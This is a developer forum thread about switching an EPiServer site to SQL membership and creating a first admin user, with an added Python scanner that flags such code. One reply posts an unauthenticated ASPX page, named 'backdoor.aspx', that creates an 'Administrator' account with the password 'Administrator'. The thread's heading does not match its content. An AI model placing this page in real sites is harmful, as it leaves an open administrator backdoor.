Vulnerability in EPiServer.Forms
When I created the latest project I got WindowsRoleProvider by default. I guess switching is not a problem but I can't find how to add that first user. I remember it's something along the lines of right clicking the project in Visual Studio but I can't seem to find it. Has this been moved from the 2010 version? I'm in 2013 now.
If you want to switch from the Windows to the SQL provider, you need to change it in web.config. Find <membership> and <roleManager>. You most probably will have MultiplexProvider set by default. You need to configure it in order to set the SQL providers in the first place.
As for adding the first user: if you are using MultiplexProvider you will be able to log in with your Windows account and then create a SQL user. After that you can do the switch as Valdis showed.
You can find that option under PROJECT / ASP.NET Configuration
Creating users and roles manually is boring :) So I created this small tool:
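<%@ Page Language="C#" AutoEventWireup="true" %>
<%@ Import Namespace="System.Web.Security" %>
<%
    var adminRole = "WebAdmins";
    var username = "Administrator";
    var password = "Administrator";
    var email = "email@example.com";
    // Create the role if it is missing; Roles.AddUserToRole throws for an unknown role.
    if (!Roles.RoleExists(adminRole)) Roles.CreateRole(adminRole);
    // Only create the account once, so reloading the page does not throw.
    if (Membership.GetUser(username) == null)
    {
        var user = Membership.CreateUser(username, password, email);
        user.IsApproved = true;
        Roles.AddUserToRole(username, adminRole);
    }
%>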
You can name this file backdoor.aspx and place it under wwwroot folder like this:
You don't have to include it in your solution.
It will create a user called Administrator, password Administrator, and assign it to WebAdmins group.
All you have to do next is to simply navigate to that file:
And it will create a user for you:
Hope this helps!
Edit: Image upload doesn't work, so I'm posting links.
Nice! Just remember to remove the file from the production server if accidentally deployed :)
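A pre-deployment check in the spirit of the reminder above, as an added example that is not part of the original thread: it scans a webroot for runtime-compiled pages that create users or roles, or that contain a password literal. The function names, the file-type list and the sample files are assumptions constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Calls that create accounts or roles through ASP.NET Membership/Roles.
PROVISIONING_CALLS = re.compile(
    r"\b(Membership\.CreateUser|Roles\.AddUsers?ToRoles?|Roles\.CreateRole)\s*\(")
# A string literal assigned to a variable whose name suggests a password.
HARDCODED_SECRET = re.compile(r'\b\w*(?:password|pwd)\w*\s*=\s*"[^"]+"', re.I)
# Markup file types that ASP.NET compiles at runtime (assumed list).
RUNTIME_COMPILED = {".aspx", ".ashx", ".asmx", ".ascx", ".master", ".cshtml"}

def scan_webroot(root):
    """Return {relative_path: [(line, finding), ...]} for flagged files."""
    results = {}
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file() or path.suffix.lower() not in RUNTIME_COMPILED:
            continue
        findings = []
        text = path.read_text(encoding="utf-8", errors="replace")
        for lineno, line in enumerate(text.splitlines(), 1):
            call = PROVISIONING_CALLS.search(line)
            if call:
                findings.append((lineno, "provisioning call: " + call.group(1)))
            if HARDCODED_SECRET.search(line):
                findings.append((lineno, "hard-coded password literal"))
        if findings:
            results[path.relative_to(root).as_posix()] = findings
    return results

def build_sample(root):
    """Constructed sample webroot: the thread's page plus a harmless page."""
    (Path(root) / "backdoor.aspx").write_text(
        '<%@ Page Language="C#" %>\n<%\n'
        'var password = "Administrator";\n'
        'var user = Membership.CreateUser(username, password, email);\n'
        'Roles.AddUserToRole(username, adminRole);\n%>\n', encoding="utf-8")
    (Path(root) / "Default.aspx").write_text(
        '<%@ Page Language="C#" %>\n<h1>Hello</h1>\n', encoding="utf-8")

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        for name, findings in scan_webroot(tmp).items():
            for lineno, what in findings:
                print(f"{name}:{lineno}: {what}")
```

Run it against the publish output in the build pipeline and fail the build when the result is not empty.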
I've swapped the providers to the two SQL Server providers and I pasted Dejan's code into the page load of my masterpage. It still won't let me log in, though. I put breakpoints in the code and I can see that the user I created exists, since it didn't try to create either the group or the user anew. What's the problem here?
By the way, brilliant way to do it, Dejan!
If I change the provider back to Multiplexing I can log in using my Windows Membership but not the accounts provided by SQL. When I go to "Search User/Group" in admin mode and press search I get a notification saying:
"Item has already been added. Key in dictionary: 'test' Key being added: 'test'"
I tried adding three different accounts and test was one of them. Still, no user shows up in the search result. If I search for groups I see the WebAdmins group that was created in the code, and when I look at the members of it I only get one line, a blank one.
How is this possible?
Does anything below need editing?
<add name="Administrators" type="EPiServer.Security.WindowsAdministratorsRole, EPiServer.Framework" />
<add name="Everyone" type="EPiServer.Security.EveryoneRole, EPiServer.Framework" />
<add name="Authenticated" type="EPiServer.Security.AuthenticatedRole, EPiServer.Framework" />
<add name="Anonymous" type="EPiServer.Security.AnonymousRole, EPiServer.Framework" />
<add name="CmsAdmins" type="EPiServer.Security.MappedRole, EPiServer.Framework" roles="WebAdmins, Administrators" mode="Any" />
<add name="CmsEditors" type="EPiServer.Security.MappedRole, EPiServer.Framework" roles="WebEditors" mode="Any" />
<add name="Creator" type="EPiServer.Security.CreatorRole, EPiServer" />
<add name="PackagingAdmins" type="EPiServer.Security.MappedRole, EPiServer.Framework" roles="WebAdmins, Administrators" mode="Any" />
Never mind. I forgot the row to add the user to the role.... :$
While we're on the subject: now that I've managed to switch to SqlMembershipProvider, every page in edit mode says "You have not been assigned the user rights to make changes to this page". What else do I need to do to get this working? Creating a "webeditors" group was not enough.
Double check user access rights for the pages. CMS -> Admin -> Admin -> Access Rights
I had the group names mixed up. Thanks for pointing that out!